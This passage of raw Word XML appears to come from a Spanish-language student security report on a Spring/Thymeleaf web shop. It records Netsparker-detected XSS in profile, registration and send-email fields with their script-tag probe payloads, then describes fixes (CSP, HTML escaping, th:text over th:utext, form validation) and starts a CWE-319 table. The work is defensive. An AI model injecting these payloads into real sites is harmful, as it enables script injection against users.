        </w:rPr>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="14"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400040"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59" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="666699"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="666699"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Profile Email (POST):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E3">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>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0E4">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="708" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E5">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="708" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="666699"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="666699"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"%3cscRipt%3enetsparker(0x006BF7)%3c%2fscRipt%3e"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E6">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="708" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="666699"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E7">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="708" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="666699"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Resgistration Email (Post):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E9">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>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0EA">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="708" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EB">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="708" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="666699"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="666699"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"'"--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;netsparker(0x007F19)&lt;/scRipt&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="708" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="666699"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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SendEmail Email (POST):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EE">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>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0EF">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="708" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>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0F1">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="708" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="666699"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="666699"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"%3cscRipt%3enetsparker(0x007F17)%3c%2fscRipt%3e</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0F2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="666699"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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4">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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Corregir XSS: </w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="0563c1"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://unpocodejava.com/2011/06/24/como-evitar-cross-site-scripting-xss-con-spring-mvc/</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F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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;meta http-equiv="Content-SecurityPolicy" content="script-src 'self'"&gt;: Esta línea indica que se está estableciendo una política de seguridad para la página. En este caso, se está limitando la ejecución de scripts a aquellos que provienen del propio sitio ('self').</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;spring:htmlEscape defaultHtmlEscape="true" /&gt;: Esta línea indica que se debe realizar un escape automático de los caracteres HTML que podrían representar una amenaza de seguridad, como por ejemplo las etiquetas &lt;script&gt; o &lt;iframe&gt;. El parámetro defaultHtmlEscape está establecido en true, lo que significa que se activa el escape por defecto.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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Cart.html -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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F">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51"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ChangePassword.html -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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3">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2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Comment.html -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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2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Error.html -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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1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Index.html -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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63"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Login.html -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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4">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7"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Oder.html -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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20"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OderConfirm.html -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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40"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Oders.html -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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55"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Payment.html -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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4">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43"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Product.html -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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57"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Products.html -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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42"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Profiule.html -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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61"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ResetPassword.html -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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6"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SendEmail.html -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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5805170"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9"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400040" cy="580517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En la plantilla de Thymeleaf, tanto th:text como th:utext se utilizan para establecer el contenido de un elemento HTML, pero tienen una diferencia importante.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000143">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th:text escapa el contenido antes de establecerlo, lo que significa que cualquier carácter que tenga un significado especial en HTML (por ejemplo, "&lt;" o "&gt;") se convertirá en su entidad HTML correspondiente ("&lt;" o "&gt;") antes de ser representado en la página. Esto es útil para evitar ataques XSS (Cross-site scripting), ya que evita que el contenido malicioso se interprete como HTML.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000144">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Por otro lado, th:utext también establece el contenido de un elemento HTML, pero sin escapar el texto. Esto significa que el texto se representa tal como está en la plantilla y se envía al navegador sin modificaciones. Es importante tener en cuenta que el uso incorrecto de th:utext puede hacer que la aplicación sea vulnerable a ataques XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000145">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Por lo tanto, en general, se recomienda utilizar th:text siempre que sea posible para asegurar que el contenido se escape adecuadamente y prevenir ataques XSS, a menos que se tenga una razón específica para utilizar th:utext.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000146">
      <w:pPr>
        <w:spacing w:after="240" w:before="24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7">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Lo que haré será cambiar utext por text, para sasi escapar los caracteres.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000148">
      <w:pPr>
        <w:spacing w:after="240" w:before="24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De estos cambios no voy sacar capturas, pues tendría que hacer muchísimas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cuveqmqq5nvn" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Validación de los campos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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UserProfileForm -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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F">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6159500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5"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1">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6159500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="34"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ResetPasswordForm -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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5">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6159500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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ProductSearchForm -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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A">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6159500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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PaymentForm -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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902585"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="31"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400040"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902585"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="19"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400040"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LoginForm -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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6">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6159500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="11"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ChangePasswordForm -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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F">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6159500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3"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1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_r01nng3qu52c" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contraseña enviada por Http-&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000172">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>
        <w:tblW w:w="56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tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2831"/>
            <w:gridCol w:w="2831"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000173">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000174">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319</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000175">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP 2013</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000176">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A6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000177">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000178">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A3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000179">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CAPEC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017A">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65</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ASVS 4.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017C">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2.2.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
